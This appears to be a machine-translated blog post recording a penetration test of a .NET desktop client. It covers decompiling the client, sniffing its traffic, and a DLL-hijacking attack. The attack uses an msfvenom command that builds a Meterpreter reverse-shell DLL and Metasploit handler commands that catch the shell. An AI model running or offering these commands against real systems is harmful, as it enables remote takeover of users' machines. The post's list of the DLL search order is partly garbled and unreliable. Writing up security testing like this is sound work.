banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

Recording a fat client program penetration test

#渗透测试644
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The article discusses the difference between "fat" and "thin" client applications, with "fat" clients being based on C/S architecture and "thin" clients being based on B/S architecture. The article then discusses the vulnerability of DLL hijacking, which involves replacing a legitimate DLL file with a malicious one to gain control over a system. The article provides steps for identifying and exploiting DLL hijacking vulnerabilities, including using tools like Sysinternals Suite and Metasploit framework. The article concludes by noting that the author was inspired to write the article after reading about a similar vulnerability in a different context.

A fat client is an application in the client-server architecture, where the client executes a portion of the application logic and the server provides storage and computing support. The two communicate and interact through a network. On the other hand, a thin client, also known as a browser-based application, is based on the B/S architecture.

When you receive a fat client program, you can first check what architecture it is based on. Usually, programs with .exe extensions are compiled in C, C#, or .NET.

You can use CFF Explorer to view the architecture of the target program, as shown in the image below.

[Image]

From the image, you can see that it is a 32-bit program compiled using Microsoft Visual Studio .NET, and it is a .NET program.

For .NET programs like this, you can use dnspy (GitHub - dnSpy/dnSpy: .NET debugger and assembly editor). DNspy is a famous .NET decompiler that can decompile .NET compiled files, including executable files (exe), DLL files, and .NET assemblies. By decompiling the exe file using DNspy, you can easily view its source code and internal structure, helping you understand and analyze the program's execution mechanism.

[Image]

From this, you can see SQL queries. From here, we can see that the SQL queries are not filtered and are directly concatenated. However, single quotes are added here, resulting in an extra single quote in each query, making it impossible to bypass.

[Image]

But if the client program can be directly decompiled, then if the client program is not signed, it can be recompiled and packaged into another program. The consequence is that it can forge the official client and write malicious files into it, allowing for phishing attacks and other attacks.

I won't include an image here, but after modification, it can be used just like a normal client program.

You can also use tools like Wireshark or Science to analyze the traffic and check if any sensitive information is leaked during the transmission.

[Image]

From the above image, you can see that this fat client uses the TDS database protocol, including the IP address and port of the nodes.

[Image]

It also leaks SQL queries during the transmission.

In addition to tools like Wireshark and Science for analyzing traffic, Echo Mirage can also be used for traffic analysis. You can download and use it yourself.

Now, let's get back to the main topic of this article, DLL hijacking vulnerability. Since it is a fat client application, it will load various DLL files.

DLL hijacking is an attack technique that takes advantage of the system's incorrect or defective search order when loading dynamic-link libraries (DLLs). It replaces a legitimate file with a malicious file when the system searches for an available DLL file, causing the system to load and execute the controlled DLL file, achieving the attacker's goal.

DLL hijacking attacks are highly dangerous and can be used for various malicious activities, such as:

  1. Stealing sensitive information: Malicious DLL files may steal users' sensitive information, such as login credentials.
  2. Executing remote commands: By hijacking DLL files, attackers may remotely control users' computers to execute malicious commands, such as downloading and installing other malicious programs.
  3. Disrupting system integrity and stability: Hijacked DLL files may compromise system security, integrity, and stability, such as tampering with system settings or damaging system files.

The first step in DLL hijacking is to obtain usable DLL files.

At this point, you can use the Sysinternals Suite, specifically the Procmon Monitor tool, to view the relevant processes of the currently running programs.

[Image]

After loading, you can see various information about the currently running program processes, such as process names, PIDs, and paths. You can filter specific program processes by pressing Ctrl+L.

[Image]

If the target program also loads configuration files, you can also view them using this tool.

Since it is DLL hijacking, we need to find usable DLL files.

[Image]

In the target program's directory, I found a DWrite.dll file. This file is part of the Windows operating system and is the DirectWrite API dynamic-link library file. DirectWrite is an API used for rendering text and fonts. It uses hardware acceleration and advanced font rendering techniques to provide higher quality and clearer text rendering effects.

In the Windows system, many applications (such as Adobe Creative Suite) use DirectWrite technology to render text and fonts, so the dwrite.dll file is called and used in many applications.

You can search for processes with "NAME NOT FOUND".

[Image]

You can try several DLL files to find DLL files. In addition to finding DLL files, you also need to understand the loading order of DLL files in Windows.

  1. Search in the application's directory.
  2. Windows system directory (e.g., C:\Windows\System32).
  3. Common Windows directories (C:\Windows\System32 and C:\Windows).
  4. Search in the Windows system directory for the Administrator type (e.g., C:\Windows\SystemWOW64).
  5. Search in all directories specified in the PATH environment variable.
  6. Current working directory.

The operating system searches for DLL files in the specified directories and files according to the above order and loads them into the application.

Once you understand the DLL loading order and find the DLL file, you can start constructing a malicious DLL file using the Metasploit framework.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.100 LPORT=4444 -a x86 --platform Windows -f dll > DWrite.dll

# LHOST=192.168.100.100, replace it with your listening IP

[Image]

[Image]

Copy the DLL file to the client's directory, start the listener on the VPS using MSF, and then start the client exe program. It will successfully return a shell.

msf6> use exploit/multi/handle
msf6> set payload windows/meterpreter/reverse_tcp
msf6> set lhost 192.168.100.100
msf6> set lport 4444
msf6> exploit

[Image]

You will directly get a system shell running on the client that runs the target program.

I wrote this article because I came across an article about DLL hijacking (https://xz.aliyun.com/t/12376). I realized that I had encountered this type of DLL vulnerability before, so I decided to record it here.

Image source

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.